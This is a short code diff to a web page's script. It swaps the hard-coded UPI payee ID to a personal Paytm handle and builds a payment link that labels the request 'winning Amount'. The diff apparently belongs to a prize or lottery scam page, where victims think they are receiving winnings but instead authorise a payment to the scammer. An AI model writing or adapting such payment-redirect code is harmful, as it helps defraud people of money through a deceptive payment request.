--- a/upi/index.html
+++ b/upi/index.html
@@ -91,9 +91,9 @@ console.log(price);
     
 <script>
   var upi = document.getElementById('upi');
-  var id = 'mundrawala@uboi' // change UPI from here
+  var id = 'mundrawala@paytm' // change UPI from here
 
-  upi.setAttribute("href", "upi://pay?pa="+id+"&am="+price);
+  upi.setAttribute("href", "upi://pay?pa="+id+"&pn=winning Amount&am="+price+"&mode=01");
 </script>
            
 
